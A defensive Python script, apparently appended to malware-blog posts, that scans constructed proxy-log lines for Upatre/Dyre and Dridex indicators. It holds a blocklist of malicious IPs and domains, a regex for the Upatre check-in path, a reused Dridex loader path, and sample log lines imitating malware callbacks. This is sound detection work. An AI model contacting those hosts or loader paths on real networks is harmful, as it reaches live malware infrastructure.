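The eFax and 'You've earned it' posts above give three network indicators for Upatre/Dyre (a direct-to-IP check-in on an odd port with a /TAG/<machine>/0/51-SP3/0/<ID> style path, a lookup to checkip.dyndns.org or icanhazip.com, and a published blocklist), and the 'copy' and Royal Canin posts show the Dridex loader being served from the same path, /yffd/yfj.exe, on five different hacked hosts. The script below turns those into detection logic over proxy log lines. It is an added example, not code from dynamoo.com or myonlinesecurity.co.uk; the log format (timestamp source method url) and the log lines are constructed, while the blocklist entries, hostnames and URL shapes are taken from the posts. It also carries the caveat a practitioner needs: an internal REST API on a private IP looks a lot like the Upatre pattern, so RFC1918 destinations are excluded, and an IP-lookup hit on its own is not treated as a compromise.

```python
"""Scan web-proxy log lines for the Upatre/Dyre and Dridex indicators given in the
posts above. Added example, not code from dynamoo.com or myonlinesecurity.co.uk;
log format and log lines are constructed, indicator values come from the posts."""
import ipaddress
import re
from urllib.parse import urlsplit

# Copied from the posts' "Recommended blocklist" entries and phone-home notes.
BLOCKLIST_IPS = {
    "93.185.4.90", "62.204.250.26", "76.84.81.120", "159.224.194.188",
    "178.222.250.35", "181.189.152.131", "194.28.190.84", "194.28.191.213",
    "199.255.132.202", "208.123.135.106", "93.171.132.5",
}
BLOCKLIST_DOMAINS = {
    "thereis.staging.nodeproduction.com", "www.buildingwalls.co.za",
    "midwestlabradoodles.com", "breedandco.com", "terrasses-de-santeny.com",
    "madagascar-gambas.com", "technibaie.net", "storesplaisance.com",
}
# Legitimate services the malware uses to learn its public IP: weak alone, strong when paired.
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "icanhazip.com"}
# Dridex loader path reused across compromised hosts: pivot on the path, not the host.
REUSED_PATHS = {"/yffd/yfj.exe"}

# Upatre check-in: direct-to-IP, high port, /TAG/<machine>/<n>/<n[-SPn]>/<n>/...
UPATRE_RE = re.compile(
    r"^https?://(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{4,5})"
    r"/(?P<tag>[A-Z0-9]{2,6})/(?P<machine>[^/]*)/\d+/\d+(?:-SP\d)?/\d+(?:/|$)"
)
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def _is_private(ip):
    try:
        return ipaddress.ip_address(ip).is_private
    except ValueError:
        return False


def _domain_blocked(host):
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST_DOMAINS)


def classify_url(url):
    """Return the indicator names a URL trips, in a fixed order ([] if none)."""
    hits = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in BLOCKLIST_IPS or _domain_blocked(host):
        hits.append("blocklist")
    m = UPATRE_RE.match(url)
    if m and not _is_private(m.group("ip")):   # internal APIs look similar: skip RFC1918
        hits.append("upatre-callback")
    if host in IP_LOOKUP_HOSTS:
        hits.append("external-ip-lookup")
    if parts.path in REUSED_PATHS:
        hits.append("dridex-loader-path")
    return hits


def scan(lines):
    """Return [(src, url, hits), ...] for every parseable line that trips an indicator."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = classify_url(m.group("url"))
        if hits:
            out.append((m.group("src"), m.group("url"), hits))
    return out


def sources_with_ip_lookup_and_c2(findings):
    """Sources that did an external-IP lookup AND hit a callback or blocklisted host:
    the pairing the eFax post describes, with lone lookups (often benign) filtered out."""
    by_src = {}
    for src, _url, hits in findings:
        by_src.setdefault(src, set()).update(hits)
    return sorted(s for s, h in by_src.items()
                  if "external-ip-lookup" in h and h & {"upatre-callback", "blocklist"})


# Constructed sample log (timestamp source method url); not real traffic.
SAMPLE_LOG = [
    "2015-07-17T10:02:11 10.0.0.15 GET http://checkip.dyndns.org/",
    "2015-07-17T10:02:12 10.0.0.15 GET http://93.185.4.90:12325/ETK7//0/51-SP3/0/GKBIMBFDBEEE",
    "2015-07-17T10:02:13 10.0.0.15 GET http://93.185.4.90:12325/ETK7//41/5/1/GKBIMBFDBEEE",
    "2015-07-17T10:05:00 10.0.0.30 GET http://www.example.com/index.html",
    "2015-07-17T10:06:00 10.0.0.30 GET http://10.1.2.3:8080/API/build/1/2/3/",
    "2015-07-17T10:07:00 10.0.0.30 GET http://icanhazip.com/",
    "2015-07-27T12:30:00 10.0.0.22 GET http://some-other-hacked-site.invalid/yffd/yfj.exe",
    "2015-07-27T12:31:05 10.0.0.22 POST http://93.171.132.5/",
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for src, url, hits in results:
        print(f"{src}  {','.join(hits):28s}  {url}")
    print("ip-lookup + C2 pairing:", sources_with_ip_lookup_and_c2(results))
```

Two things worth noting from the constructed log: 10.0.0.30 does an icanhazip.com lookup and an internal `10.1.2.3:8080/API/...` call that matches the Upatre path shape, and is reported for neither as a compromise; 10.0.0.22 never touches an IP-lookup service but is caught by the reused loader path and the blocklisted 93.171.132.5, which is why the path indicator is kept separate from the host blocklist rather than folded into it.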